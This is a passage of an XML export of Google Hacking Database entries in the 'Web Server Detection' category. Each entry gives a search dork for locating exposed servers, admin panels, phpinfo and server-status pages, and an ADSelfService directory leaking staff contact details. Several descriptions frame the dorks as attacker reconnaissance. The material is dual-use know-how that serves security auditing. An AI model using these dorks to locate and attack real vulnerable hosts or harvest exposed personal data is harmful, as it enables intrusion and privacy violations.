<edb></edb>
<date>2004-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>5231</id>
<link>https://www.exploit-db.com/ghdb/5231</link>
<category>Web Server Detection</category>
<shortDescription>inurl:jsmol.php</shortDescription>
<textualDescription>Moodle sites using Jsmol.
</textualDescription>
<query>inurl:jsmol.php</query>
<querystring>https://www.google.com/search?q=inurl:jsmol.php</querystring>
<edb></edb>
<date>2019-05-30</date>
<author>Dec0y</author>
</entry>
<entry>
<id>1194</id>
<link>https://www.exploit-db.com/ghdb/1194</link>
<category>Web Server Detection</category>
<shortDescription>inurl:nnls_brand.html OR inurl:nnls_nav.html</shortDescription>
<textualDescription>Novell Nterprise Linux Services detection dork. Some of the features are:* iFolder* Samba* NetStorage* eDirectory Administration* Linux User Management* NMAS 2.3* NetMail 3.5* GroupWise 6.5* iPrint* Virtual Office</textualDescription>
<query>inurl:nnls_brand.html OR inurl:nnls_nav.html</query>
<querystring>https://www.google.com/search?q=inurl:nnls_brand.html+OR+inurl:nnls_nav.html&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>842</id>
<link>https://www.exploit-db.com/ghdb/842</link>
<category>Web Server Detection</category>
<shortDescription>inurl:oraweb -site:oraweb.org</shortDescription>
<textualDescription>Oracle administrators tend to naming their servers ora* - maybe because they forget the name of their database all the time.So the Oracle webserver is very often named oraweb.</textualDescription>
<query>inurl:oraweb -site:oraweb.org</query>
<querystring>https://www.google.com/search?q=inurl%3Aoraweb+-site%3Aoraweb.org</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>5256</id>
<link>https://www.exploit-db.com/ghdb/5256</link>
<category>Web Server Detection</category>
<shortDescription>inurl:OrganizationChart.cc</shortDescription>
<textualDescription>This dork finds all website using ADSelfService and authorizing guest access to the LDAP directory. Access name, mail, mobile number, function...
# Exploit Title: ADSelfService
# Google Dork: inurl:OrganizationChart.cc
# Date: June 14, 2019
# Exploit Author: mcandberry
# Vendor Homepage: https://www.manageengine.com/
</textualDescription>
<query>inurl:OrganizationChart.cc</query>
<querystring>https://www.google.com/search?q=inurl:OrganizationChart.cc</querystring>
<edb></edb>
<date>2019-06-17</date>
<author>mcandberry</author>
</entry>
<entry>
<id>5268</id>
<link>https://www.exploit-db.com/ghdb/5268</link>
<category>Web Server Detection</category>
<shortDescription>inurl:phpinfo.php intext:build 2600</shortDescription>
<textualDescription>finds web servers that have been unmaintained for literal decades.
inurl:phpinfo.php finds web servers running php and giving system info,
intext:build 2600 finds XP machines, meaning that you usually get very
outdated PHP and Apache versions.
</textualDescription>
<query>inurl:phpinfo.php intext:build 2600</query>
<querystring>https://www.google.com/search?q=inurl:phpinfo.php intext:build 2600</querystring>
<edb></edb>
<date>2019-06-24</date>
<author>dorian</author>
</entry>
<entry>
<id>4606</id>
<link>https://www.exploit-db.com/ghdb/4606</link>
<category>Web Server Detection</category>
<shortDescription>inurl:phpmyadmin/themes intext:&quot;pmahomme&quot;</shortDescription>
<textualDescription>This will help to identify websites that host phpmyadmin by detecting
the exposed theme files
Visakh V Nair
</textualDescription>
<query>inurl:phpmyadmin/themes intext:&quot;pmahomme&quot;</query>
<querystring>https://www.google.com/search?q=inurl:phpmyadmin/themes intext:&quot;pmahomme&quot;</querystring>
<edb></edb>
<date>2017-10-31</date>
<author>Visakh V Nair</author>
</entry>
<entry>
<id>4224</id>
<link>https://www.exploit-db.com/ghdb/4224</link>
<category>Web Server Detection</category>
<shortDescription>inurl:phpsysinfo/index.php?disp=dynamic</shortDescription>
<textualDescription>These Dork show a lot of info about servers behind the webpages.
Enjoy healthy.
Best Regard.
Rootkit Pentester.</textualDescription>
<query>inurl:phpsysinfo/index.php?disp=dynamic</query>
<querystring>https://www.google.com/search?q=inurl:phpsysinfo/index.php?disp=dynamic</querystring>
<edb></edb>
<date>2016-03-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4607</id>
<link>https://www.exploit-db.com/ghdb/4607</link>
<category>Web Server Detection</category>
<shortDescription>inurl:readme.md intext:&quot;Laravel&quot;</shortDescription>
<textualDescription>Reason:Lavavel package comes with readme.md and Since it's a part of
default package it get indexed and able to identify the framework using
this dork which can be further used for exploiting.
</textualDescription>
<query>inurl:readme.md intext:&quot;Laravel&quot;</query>
<querystring>https://www.google.com/search?q=inurl:readme.md intext:&quot;Laravel&quot;</querystring>
<edb></edb>
<date>2017-10-31</date>
<author>Rejul Raghu</author>
</entry>
<entry>
<id>4585</id>
<link>https://www.exploit-db.com/ghdb/4585</link>
<category>Web Server Detection</category>
<shortDescription>inurl:readme.rst intext:&quot;CodeIgniter&quot;</shortDescription>
<textualDescription>Google Search:inurl:readme.rst intext:&quot;CodeIgniter&quot;
Explanation: CodeIgniter comes with a default offline readme.rst which
most of the installed applications don't remove and gets indexed. Its can
able to identify the framework and exploit it.
*Vishnu Prasad P G*</textualDescription>
<query>inurl:readme.rst intext:&quot;CodeIgniter&quot;</query>
<querystring>https://www.google.com/search?q=inurl:readme.rst intext:&quot;CodeIgniter&quot;</querystring>
<edb></edb>
<date>2017-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4796</id>
<link>https://www.exploit-db.com/ghdb/4796</link>
<category>Web Server Detection</category>
<shortDescription>inurl:rvsindex.php &amp; /rvsindex.php?/user/login</shortDescription>
<textualDescription>*Google* dork *description: *sites running the rvsitebuilder CMS
*Google Search: inurl:rvsindex.php &amp; /rvsindex.php?/user/login*
*Submitted by:* Alfie
*Website: (*https://the-infosec.com*)*
</textualDescription>
<query>inurl:rvsindex.php &amp; /rvsindex.php?/user/login</query>
<querystring>https://www.google.com/search?q=inurl:rvsindex.php &amp; /rvsindex.php?/user/login</querystring>
<edb></edb>
<date>2018-04-25</date>
<author>Alfie</author>
</entry>
<entry>
<id>50</id>
<link>https://www.exploit-db.com/ghdb/50</link>
<category>Web Server Detection</category>
<shortDescription>inurl:tech-support inurl:show Cisco</shortDescription>
<textualDescription>This is a way to find Cisco products with an open web interface. These are generally supposed to be user and password protected. Google finds ones that aren't. Be sure to use Google's cache if you have trouble connecting. Also, there are very few results (2 at the time of posting.)</textualDescription>
<query>inurl:tech-support inurl:show Cisco</query>
<querystring>https://www.google.com/search?q=inurl%3Atech%2Dsupport+inurl%3Ashow+Cisco</querystring>
<edb></edb>
<date>2003-08-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4916</id>
<link>https://www.exploit-db.com/ghdb/4916</link>
<category>Web Server Detection</category>
<shortDescription>inurl:tests/mocks intext:autoloader</shortDescription>
<textualDescription>*inurl:tests/mocks intext:autoloader*
This will help us identify websites made with codeigniter.
Thank you
Athira M
</textualDescription>
<query>inurl:tests/mocks intext:autoloader</query>
<querystring>https://www.google.com/search?q=inurl:tests/mocks intext:autoloader</querystring>
<edb></edb>
<date>2018-08-13</date>
<author>Athira M</author>
</entry>
<entry>
<id>4373</id>
<link>https://www.exploit-db.com/ghdb/4373</link>
<category>Web Server Detection</category>
<shortDescription>inurl:user_guide intext:&quot;CodeIgniter User Guide&quot;</shortDescription>
<textualDescription>*Explanation: *CodeIgniter comes with a default offline user guide which
most of the installed applications don't remove and gets indexed.
*Google dork: *inurl:user_guide intext:&quot;CodeIgniter User Guide&quot;
Thanks
Sreenath Sasikumar</textualDescription>
<query>inurl:user_guide intext:&quot;CodeIgniter User Guide&quot;</query>
<querystring>https://www.google.com/search?q=inurl:user_guide intext:&quot;CodeIgniter User Guide&quot;</querystring>
<edb></edb>
<date>2016-12-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1262</id>
<link>https://www.exploit-db.com/ghdb/1262</link>
<category>Web Server Detection</category>
<shortDescription>inurl:wl.exe inurl:?SS1= intext:&quot;Operating system:&quot; -edu -gov -mil</shortDescription>
<textualDescription>List server apparently keeps track of many clients, not just Domains and hardware, but Operating systems as well. As always this information is able to be gained by Zero Packet methods.</textualDescription>
<query>inurl:wl.exe inurl:?SS1= intext:&quot;Operating system:&quot; -edu -gov -mil</query>
<querystring>https://www.google.com/search?q=inurl:wl.exe+inurl:%3FSS1%3D+intext:%22Operating+system:%22+-edu+-gov+-mil&amp;start=90&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6604</id>
<link>https://www.exploit-db.com/ghdb/6604</link>
<category>Web Server Detection</category>
<shortDescription>inurl:_vti_bin/Authentication.asmx</shortDescription>
<textualDescription># Google Dork: inurl:_vti_bin/Authentication.asmx
# Date: 10/11/2020
# Exploit Author: Javier Bernardo
# Homepage: https://www.hack.com.ar
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Email: javierbernardo001@gmail.com
</textualDescription>
<query>inurl:_vti_bin/Authentication.asmx</query>
<querystring>https://www.google.com/search?q=inurl:_vti_bin/Authentication.asmx</querystring>
<edb></edb>
<date>2020-10-12</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>16</id>
<link>https://www.exploit-db.com/ghdb/16</link>
<category>Web Server Detection</category>
<shortDescription>OpenBSD running Apache</shortDescription>
<textualDescription>I like the OpenBSD operating system. I really do. And I like the Apache web server software. Honestly. I admire the mettle of administrators who take the time to run quality, secure software. The problem is that you never know when security problems will pop up. A BIG security problem popped up within the OpenBSD/Apache combo back in the day.Now, every administrator that advertised this particular combo with cute little banners has a problem. Hackers can find them with Google. I go easy on these folks since the odds are they.ve patched their sites already. Then again, they may just show up on zone-h..</textualDescription>
<query>&quot;powered by openbsd&quot; +&quot;powered by apache&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+openbsd%22+%2B%22powered+by+apache%22</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>893</id>
<link>https://www.exploit-db.com/ghdb/893</link>
<category>Web Server Detection</category>
<shortDescription>Powered.by.RaidenHTTPD intitle:index.of</shortDescription>
<textualDescription>RaidenHTTPD ( http://www.raidenhttpd.com/en ) is a full featured web server software for Windows</textualDescription>
<query>Powered.by.RaidenHTTPD intitle:index.of</query>
<querystring>https://www.google.com/search?num=100&amp;q=Powered.by.RaidenHTTPD+intitle%3Aindex.of</querystring>
<edb></edb>
<date>2005-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>329</id>
<link>https://www.exploit-db.com/ghdb/329</link>
<category>Web Server Detection</category>
<shortDescription>Red Hat Unix Administration</shortDescription>
<textualDescription>Red Hat UNIX Administration Pages. This search detects the fixed title for the admin pages on certain Red Hat servers. A login is required to access them, but an attacker could use this search to determine the operating system used by the server.</textualDescription>
<query>intitle:&quot;Page rev */*/*&quot; inurl:&quot;admin</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22Page+rev+*%2F*%2F*%22+inurl%3A%22admin</querystring>
<edb></edb>
<date>2004-07-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>359</id>
<link>https://www.exploit-db.com/ghdb/359</link>
<category>Web Server Detection</category>
<shortDescription>sEDWebserver * server +at intitle:index.of</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>sEDWebserver * server +at intitle:index.of</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=SEDWebserver+*+server+%2Bat+intitle%3Aindex.of</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>7449</id>
<link>https://www.exploit-db.com/ghdb/7449</link>
<category>Web Server Detection</category>
<shortDescription>site:*/*.asp</shortDescription>
<textualDescription># Google Dork: site:*/*.asp
# Web Server Detection
# Date:14/10/2021
# Exploit Author: César Hernández Obispo</textualDescription>
<query>site:*/*.asp</query>
<querystring>https://www.google.com/search?q=site:*/*.asp</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>5548</id>
<link>https://www.exploit-db.com/ghdb/5548</link>
<category>Web Server Detection</category>
<shortDescription>site:*/server-status intext:&quot;Apache server status for&quot;</shortDescription>
<textualDescription>Files containing Juicy info:
site:*/server-status intext:&quot;Apache server status for&quot;
site:*/server-info intext:&quot;Apache server Information&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/server-status intext:&quot;Apache server status for&quot;</query>
<querystring>https://www.google.com/search?q=site:*/server-status intext:&quot;Apache server status for&quot;</querystring>
<edb></edb>
<date>2019-09-24</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5760</id>
<link>https://www.exploit-db.com/ghdb/5760</link>
<category>Web Server Detection</category>
<shortDescription>site:ftp.*.com &quot;Web File Manager&quot;</shortDescription>
<textualDescription>This google dork searches for &quot;Rumpus FTP Web File Manager&quot;.
Dork: site:ftp.*.com &quot;Web File Manager&quot;
Harshit Shukla
</textualDescription>
<query>site:ftp.*.com &quot;Web File Manager&quot;</query>
<querystring>https://www.google.com/search?q=site:ftp.*.com &quot;Web File Manager&quot;</querystring>
<edb></edb>
<date>2020-03-02</date>
<author>Harshit Shukla</author>
</entry>
<entry>
<id>7840</id>
<link>https://www.exploit-db.com/ghdb/7840</link>
<category>Web Server Detection</category>
<shortDescription>site:vps-*.vps.ovh.net</shortDescription>
<textualDescription># Dork: site:vps-*.vps.ovh.net
# Author: Chahine Boutighane</textualDescription>
<query>site:vps-*.vps.ovh.net</query>
<querystring>https://www.google.com/search?q=site:vps-*.vps.ovh.net</querystring>
<edb></edb>
<date>2022-01-12</date>
<author>Chahine Boutighane</author>
</entry>
<entry>
<id>923</id>
<link>https://www.exploit-db.com/ghdb/923</link>
<category>Web Server Detection</category>
<shortDescription>thttpd webserver</shortDescription>
<textualDescription>thttpd is is a webserver written in C and should compile and run on most unix-like systems. As of version 2.20 or later, thttpd is known to build and run on the following platforms, usually on at least recent platform versions: * FreeBSD* NetBSD* BSD/OS* Solaris* Tru64 / DIGITAL UNIX / OSF/1* SunOS* Linux* HP-UX* MacOS X* UnixWare* AMIGAOS* NCR MP-RAS BASE 3.02 (EISA/MCA)* Sega Dreamcast* Compaq iPaq 3765* Windows 2000/XP (port of 2.07 only)</textualDescription>
<query>intitle:&quot;Index of *&quot; mode links bytes last-changed name</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=intitle%3A%22Index+of+*%22+mode++links++bytes++last-changed++name</querystring>
<edb></edb>
<date>2005-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>13</id>
<link>https://www.exploit-db.com/ghdb/13</link>
<category>Web Server Detection</category>
<shortDescription>Windows 2000 Internet Services</shortDescription>
<textualDescription>At first glance, this search reveals even more examples of operating system users enabling the operating system default web server software. This is generally accepted to be a Bad Idea(TM) as mentioned in the previous example. However, the googleDork index on this particular category gets quite a boost from the fact that this particular screen should NEVER be seen by the general public. To quote the default index screen: &quot;Any users attempting to connect to this site are currently receiving an 'Under Construction page'&quot; THIS is not the 'Under Construction page.' I was only able to generate this screen while sitting at the console of the server. The fact that this screen is revealed to the general public may indicate a misconfiguration of a much more insidious nature...</textualDescription>
<query>intitle:&quot;Welcome to Windows 2000 Internet Services&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Welcome+to+Windows+2000+Internet+Services%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>827</id>
<link>https://www.exploit-db.com/ghdb/827</link>
<category>Web Server Detection</category>
<shortDescription>XAMPP &quot;inurl:xampp/index&quot;</shortDescription>
<textualDescription>XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start. At the moment there are three XAMPP distributions.-allows you to write emails (mercury Mail)-some phpmyadmin are unprotected-security details of the server-maybe some more things ;-)</textualDescription>
<query>XAMPP &quot;inurl:xampp/index&quot;</query>
<querystring>https://www.google.com/search?client=safari&amp;rls=en&amp;q=XAMPP+%22inurl:xampp/index%22&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2005-01-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>921</id>
<link>https://www.exploit-db.com/ghdb/921</link>
<category>Web Server Detection</category>
<shortDescription>yaws.*.server.at</shortDescription>
<textualDescription>YAWS (http://yaws.hyber.org), Yet Another Web Server, is a HTTP high perfomance 1.1 webserver. Yaws is entirely written in Erlang, furthermore it is a multithreaded webserver where one Erlang light weight process is used to handle each client.</textualDescription>
<query>yaws.*.server.at</query>
<querystring>https://www.google.com/search?q=yaws.%2A.server.at</querystring>
<edb></edb>
<date>2005-03-31</date>
<author>anonymous</author>
</entry>
</ghdb>